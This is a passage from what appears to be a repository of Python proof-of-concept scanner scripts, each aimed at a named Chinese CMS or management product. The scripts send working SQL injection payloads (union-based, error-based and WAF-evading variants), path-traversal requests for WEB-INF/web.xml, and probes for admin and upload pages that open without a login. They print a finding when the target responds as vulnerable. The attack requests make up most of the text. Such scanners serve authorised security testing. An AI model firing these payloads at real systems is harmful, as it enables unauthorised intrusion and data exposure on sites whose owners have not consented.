4 | name: GN SQL Injection
5 | referer: unknown
6 | author: Lucifer
7 | description: GN SQL injection。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
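class gn_consulting_sqli_BaseVerify:
    """Check a GN site for SQL injection in news_detail.php.

    The sn parameter carries a UNION SELECT that returns the MD5 of 1234;
    the target is reported when that digest appears in the response body.
    """

    def __init__(self, url):
        # Base URL of the site under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/news_detail.php?sn=-7%27+/*!50000UnIoN*/+SeLeCt+1,2,3,Md5(1234),5,6,7--%20-"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # Marker is md5("1234").
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在GN SQL Injection漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")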
31 |
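if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = gn_consulting_sqli_BaseVerify(sys.argv[1])
    testVuln.run()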
--------------------------------------------------------------------------------
/pocs/cms/others/gxwssb_fileDownloadmodel_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天津神州助平台通用型任意下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-087767
6 | author: Lucifer
7 | description: 文件/gxwssb/fileDownloadmodel中,参数name存在任意文件下载。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
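class gxwssb_fileDownloadmodel_download_BaseVerify:
    """Check a gxwssb platform for arbitrary file download.

    Requests /gxwssb/fileDownloadmodel with name set to ../WEB-INF/web.xml
    and reports the target when the response is served as application/xml.
    """

    def __init__(self, url):
        # Base URL of the site under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send one GET request and print a finding on an XML response.

        Returns None; output goes to the terminal through cprint.
        """
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payload = "/gxwssb/fileDownloadmodel?name=../WEB-INF/web.xml"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
            # headers.get(): a response without Content-Type used to raise
            # KeyError, which the handler below reported as a timeout.
            # NOTE(review): header-only heuristic -- any endpoint answering
            # application/xml matches, and a value carrying a charset suffix
            # does not; confirm hits manually.
            if req.headers.get("Content-Type") == "application/xml":
                cprint("[+]存在天津神州助平台通用型任意下载漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")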
31 |
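if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = gxwssb_fileDownloadmodel_download_BaseVerify(sys.argv[1])
    testVuln.run()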
--------------------------------------------------------------------------------
/pocs/cms/others/hnkj_researchinfo_dan_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 汇能群管理系统SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2010-0152664
6 | author: Lucifer
7 | description: 链接/main/model/childcatalog/researchinfo_dan.jsp?researchId=1中 researchID未过滤存在SQL注入漏洞
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
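class hnkj_researchinfo_dan_sqli_BaseVerify:
    """Check an hnkj management system for SQL injection in researchinfo_dan.jsp.

    The researchId parameter carries a UNION SELECT that returns the MD5 of
    '1234'; the target is reported when that digest appears in the response
    body.
    """

    def __init__(self, url):
        # Base URL of the system under test; the request path is appended as-is.
        self.url = url

    def run(self):
        """Send the probe once and print a finding when the marker appears.

        Returns None; output goes to the terminal through cprint.
        """
        payload = "/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)),3%20from%20H_System_User--"
        vulnurl = self.url + payload
        try:
            # TLS certificate validation is switched off for this request.
            req = requests.get(vulnurl, timeout=10, verify=False)

            # Marker is md5("1234").
            if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
                cprint("[+]存在汇能群管理系统 SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
        except Exception:
            # Was a bare except, which also swallowed KeyboardInterrupt and
            # SystemExit. The message still reads "connection timed out".
            cprint("[-] "+__file__+"====>连接超时", "cyan")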
29 |
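if __name__ == "__main__":
    # The base URL is required; without it sys.argv[1] raised IndexError.
    if len(sys.argv) < 2:
        sys.exit("usage: " + sys.argv[0] + " <base_url>")
    # Suppresses all Python warnings for this process.
    warnings.filterwarnings("ignore")
    testVuln = hnkj_researchinfo_dan_sqli_BaseVerify(sys.argv[1])
    testVuln.run()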
--------------------------------------------------------------------------------
/pocs/cms/others/huaficms_bypass_js.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 华飞科技cms绕过JS GETSHELL
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-083888
6 | author: Lucifer
7 | description: /admin/User/manageadmin.aspx 禁用JS可以直接访问。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class huaficms_bypass_js_BaseVerify:
    """Check whether /admin/User/manageadmin.aspx is served without a login.

    The module header states the page can be opened directly with JavaScript
    disabled. A 200 response that references addadmin.aspx is treated as a
    hit; access control has to be enforced on the server, not in script.
    """

    def __init__(self, url):
        # Base URL of the site to check; the admin path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the admin page is returned."""
        vulnurl = self.url + "/admin/User/manageadmin.aspx"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if response.status_code == 200:
                if "addadmin.aspx" in response.text:
                    cprint("[+]存在华飞科技cms绕过JS GETSHELL漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
32 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    huaficms_bypass_js_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/jxt1039_unauth.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 1039驾校通未授权访问漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0132856
6 | author: Lucifer
7 | description: 1039驾校通通用型系统存在未授权漏洞。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class jxt1039_unauth_BaseVerify:
    """Check whether /headmaster/Index.aspx is reachable without authentication.

    A response that links to both ShengQingPS.aspx and LiuShuiZhang.aspx is
    taken as the management page being served to an anonymous client; the
    page should sit behind a server-side session check.
    """

    def __init__(self, url):
        # Base URL of the site to check; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when both page links appear."""
        vulnurl = self.url + "/headmaster/Index.aspx"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            page = response.text
            if "ShengQingPS.aspx" in page and "LiuShuiZhang.aspx" in page:
                cprint("[+]存在1039驾校通未授权访问漏洞...(中危)\tpayload: " + vulnurl, "yellow")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    jxt1039_unauth_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/kj65n_monitor_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: kj65n煤矿远程监控系统SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0148855
6 | author: Lucifer
7 | description:
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class kj65n_monitor_sqli_BaseVerify:
    """Detect SQL injection in trbl_deal_modi.asp via the pId parameter.

    The probe selects @@version in a UNION; a 200 response containing
    "Microsoft SQL Server" is treated as the version banner being echoed.
    NOTE(review): that phrase could also appear on an unrelated page, so a hit
    is worth confirming manually. The fix is a parameterised query for pId.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the banner text appears."""
        vulnurl = self.url + "/yhpc/trbl_deal_modi.asp?pActFlag=MODIFY&pId=-7653%27%20UnIoN%20AlL%20SeLeCt%20NuLL,NuLL,NuLL,NuLL,@@version,NuLL,NuLL,NuLL,NuLL,NuLL--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if response.status_code == 200:
                if "Microsoft SQL Server" in response.text:
                    cprint("[+]存在kj65n煤矿远程监控系统SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    kj65n_monitor_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/nongyou_Item2_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 农友政务系统Item2.aspx SQL注入
5 | referer: http://wooyun.org/bugs/wooyun-2010-0120498
6 | author: Lucifer
7 | description: 文件/newsymItemView/Item2.aspx中,参数id存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class nongyou_Item2_sqli_BaseVerify:
    """Detect SQL injection in /newsymItemView/Item2.aspx via the id parameter.

    The probe asks the database for MD5(1234) in a UNION; the digest showing
    up in the page means id is concatenated into the query. The fix is to
    bind id as a query parameter.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the digest is echoed."""
        vulnurl = self.url + "/newsymItemView/Item2.aspx?id=021973%27UnIoN%20AlL%20SeLeCt%20NuLl%2CNuLl%2CNuLl%2CNuLl%2CNuLl%2CNuLl%2CNuLl%2CCoNcAt%28Md5%281234%29%29%2CNuLl%2CNuLl%23"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Hex MD5 digest of "1234", which the probe asks for.
        md5_of_1234 = "81dc9bdb52d04dc20036dbd8313ed055"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if md5_of_1234 in response.text:
                cprint("[+]存在农友政务系统Item2.aspx SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    nongyou_Item2_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/shiyou_list_keyWords_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 师友list.aspx keywords SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-082296
6 | author: Lucifer
7 | description: 文件/webSchool/list.aspx中,参数keywords存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class shiyou_list_keyWords_sqli_BaseVerify:
    """Detect SQL injection in /webSchool/list.aspx via the keyWords parameter.

    The probe compares a number with the hex MD5 of '1234'; the digest showing
    up in the response (presumably inside a conversion error) means keyWords
    reaches the SQL text unescaped. The fix is a parameterised query.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the digest is echoed."""
        # "%%" is sent literally: this string is never %-formatted.
        vulnurl = self.url + "/webSchool/list.aspx?keyWords=1%%27AnD/**/1>Sys.Fn_VarbinTohexstr(HashBytes(%27Md5%27,%271234%27))AnD/**/%27%%27=%27"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # Hex MD5 digest of "1234", which the probe asks for.
        md5_of_1234 = "81dc9bdb52d04dc20036dbd8313ed055"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if md5_of_1234 in response.text:
                cprint("[+]存在师友list.aspx keywords SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    shiyou_list_keyWords_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/sinda_downloadfile_download.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 中农信达监察平台任意文件下载
5 | referer: http://www.wooyun.org/bugs/wooyun-2014-069864
6 | author: Lucifer
7 | description: servlet/downloadfile?filename= 文件下载。/hzs/HTMLEditor/upload_img.jsp 任意文件上传。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
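class sinda_downloadfile_download_BaseVerify:
    """Check whether servlet/downloadfile returns WEB-INF/web.xml for a traversal path.

    A hit means the filename parameter is used to open files without being
    confined to the download directory; the servlet should resolve the path
    and reject anything outside its base directory.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    @staticmethod
    def _looks_like_web_xml(body):
        """Return True when *body* contains the root element of a deployment descriptor.

        The marker literals in this check were empty strings, which are
        contained in every response, so any reachable host was reported.
        "<web-app" is the root element of web.xml.
        NOTE(review): confirm the intended markers against the upstream file.
        """
        return "<web-app" in body

    def run(self):
        """Send one GET request and print a finding when web.xml content comes back."""
        vulnurl = self.url + "/finance/servlet/downloadfile?filename=/../WEB-INF/web.xml&userid=/"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if self._looks_like_web_xml(response.text):
                cprint("[+]存在中农信达监察平台任意文件下载漏洞...(高危)\tpayload: " + vulnurl, "red")
        except Exception:
            # Still best-effort, but Ctrl-C and SystemExit are no longer
            # swallowed and reported as a timeout.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")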
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    sinda_downloadfile_download_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/skytech_bypass_priv.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: skytech政务系统越权漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-081902
6 | author: Lucifer
7 | description: skytech政务系统越权漏洞,泄露敏感信息。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class skytech_bypass_priv_BaseVerify:
    """Check whether /admin/sysconfig_reg_page.aspx is served without authorisation.

    A response containing both the txtUserRights and txtTitle field names is
    taken as the configuration page being exposed; the page should require an
    authenticated, authorised session on the server side.
    """

    def __init__(self, url):
        # Base URL of the site to check; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when both field names appear."""
        vulnurl = self.url + "/admin/sysconfig_reg_page.aspx"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, timeout=10, verify=False)
            page = response.text
            if "txtUserRights" in page and "txtTitle" in page:
                cprint("[+]存在skytech政务系统越权漏洞...(敏感信息)\tpayload: " + vulnurl, "green")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
28 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    skytech_bypass_priv_BaseVerify(sys.argv[1]).run()
33 |
--------------------------------------------------------------------------------
/pocs/cms/others/suntown_upfile_fileupload.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: suntown未授权任意文件上传漏洞
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-063656
6 | author: Lucifer
7 | description: 文件/zhidao/zhidao/search.php中,参数fulltext存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class suntown_upfile_fileupload_BaseVerify:
    """Check whether the upload page /admini/upfile/upfile.aspx is reachable without a login.

    A response containing both PageA_name and PageA_per is taken as the upload
    form being served to an anonymous client. The page should require an
    authenticated session and restrict what may be uploaded.
    NOTE(review): the module header's description talks about a search.php
    SQL injection, which does not match this probe.
    """

    def __init__(self, url):
        # Base URL of the site to check; the page path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when both form markers appear."""
        vulnurl = self.url + "/admini/upfile/upfile.aspx"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            page = response.text
            if "PageA_name" in page and "PageA_per" in page:
                cprint("[+]存在suntown未授权任意文件上传漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    suntown_upfile_fileupload_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_Class_Info_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统Class_Info.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0147384
6 | author: Lucifer
7 | description: 文件Class_Info.aspx中,参数courseid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class tianbo_Class_Info_sqli_BaseVerify:
    """Detect SQL injection in /Web_Org/Class_Info.aspx via the courseid parameter.

    The probe converts "WtFaBc" + @@VERSION to INT; the marker
    "WtFaBcMicrosoft" in the response (presumably inside the conversion error)
    means courseid reaches the SQL text. Fix: bind courseid as a parameter and
    do not return database errors to the client.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the marker is echoed."""
        vulnurl = self.url + "/Web_Org/Class_Info.aspx?courseid=50%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # CHAR(87,116,70,97,66,99) spells "WtFaBc"; "Microsoft" is expected from @@VERSION.
        marker = "WtFaBcMicrosoft"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在天柏在线培训系统Class_Info.aspx SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    tianbo_Class_Info_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_St_Info_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统St_Info.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0121651
6 | author: Lucifer
7 | description: 文件/Web_Org/St_Info.aspx中,参数typeid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class tianbo_St_Info_sqli_BaseVerify:
    """Detect SQL injection in /Web_Org/St_Info.aspx via the typeid parameter.

    The probe converts "WtFaBc" + @@VERSION to INT; the marker
    "WtFaBcMicrosoft" in the response (presumably inside the conversion error)
    means typeid reaches the SQL text. Fix: bind typeid as a parameter and do
    not return database errors to the client.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the marker is echoed."""
        vulnurl = self.url + "/Web_Org/St_Info.aspx?typeid=3%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # CHAR(87,116,70,97,66,99) spells "WtFaBc"; "Microsoft" is expected from @@VERSION.
        marker = "WtFaBcMicrosoft"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在天柏在线培训系统St_Info.aspx SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    tianbo_St_Info_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_TCH_list_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统TCH_list.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2010-0143143
6 | author: Lucifer
7 | description: 文件TCH_list.aspx中,参数typeid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class tianbo_TCH_list_sqli_BaseVerify:
    """Detect SQL injection in /Web_Org/TCH_list.aspx via the typeid parameter.

    The probe converts "WtFaBc" + @@VERSION to INT; the marker
    "WtFaBcMicrosoft" in the response (presumably inside the conversion error)
    means typeid reaches the SQL text. Fix: bind typeid as a parameter and do
    not return database errors to the client.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the marker is echoed."""
        vulnurl = self.url + "/Web_Org/TCH_list.aspx?typeid=9/**/AnD/**/1=CoNvErt(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # CHAR(87,116,70,97,66,99) spells "WtFaBc"; "Microsoft" is expected from @@VERSION.
        marker = "WtFaBcMicrosoft"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在天柏在线培训系统TCH_list.aspx SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    tianbo_TCH_list_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/tianbo_Type_List_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 天柏在线培训系统Type_List.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0144529
6 | author: Lucifer
7 | description: 文件Type_List.aspx中,参数typeid存在SQL注入。
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
class tianbo_Type_List_sqli_BaseVerify:
    """Detect SQL injection in /Web_Org/Type_List.aspx via the typeid parameter.

    The probe converts "WtFaBc" + @@VERSION to INT; the marker
    "WtFaBcMicrosoft" in the response (presumably inside the conversion error)
    means typeid reaches the SQL text. Fix: bind typeid as a parameter and do
    not return database errors to the client.
    """

    def __init__(self, url):
        # Base URL of the site to check; the probe path is appended verbatim.
        self.url = url

    def run(self):
        """Send one GET request and print a finding when the marker is echoed."""
        vulnurl = self.url + "/Web_Org/Type_List.aspx?typeid=1%20AnD%201=CoNvErT(InT,ChAr(87)%2BChAr(116)%2BChAr(70)%2BChAr(97)%2BChAr(66)%2BChAr(99)%2B@@VeRsIoN)--"
        request_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        # CHAR(87,116,70,97,66,99) spells "WtFaBc"; "Microsoft" is expected from @@VERSION.
        marker = "WtFaBcMicrosoft"
        try:
            # verify=False: the TLS certificate is not validated for this request.
            response = requests.get(vulnurl, headers=request_headers, timeout=10, verify=False)
            if marker in response.text:
                cprint("[+]存在天柏在线培训系统Type_List.aspx SQL注入漏洞...(高危)\tpayload: " + vulnurl, "red")
        except:
            # Bare except kept: every error, not only a timeout, prints the
            # timeout message below.
            cprint("[-] " + __file__ + "====>连接超时", "cyan")
31 |
if __name__ == "__main__":
    # Standalone use: argv[1] is the base URL to check. All Python warnings are
    # silenced first (run() makes its request with verify=False).
    warnings.filterwarnings("ignore")
    tianbo_Type_List_sqli_BaseVerify(sys.argv[1]).run()
--------------------------------------------------------------------------------
/pocs/cms/others/yeu_disclosure_uid.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: 依友POS系统登陆信息泄露
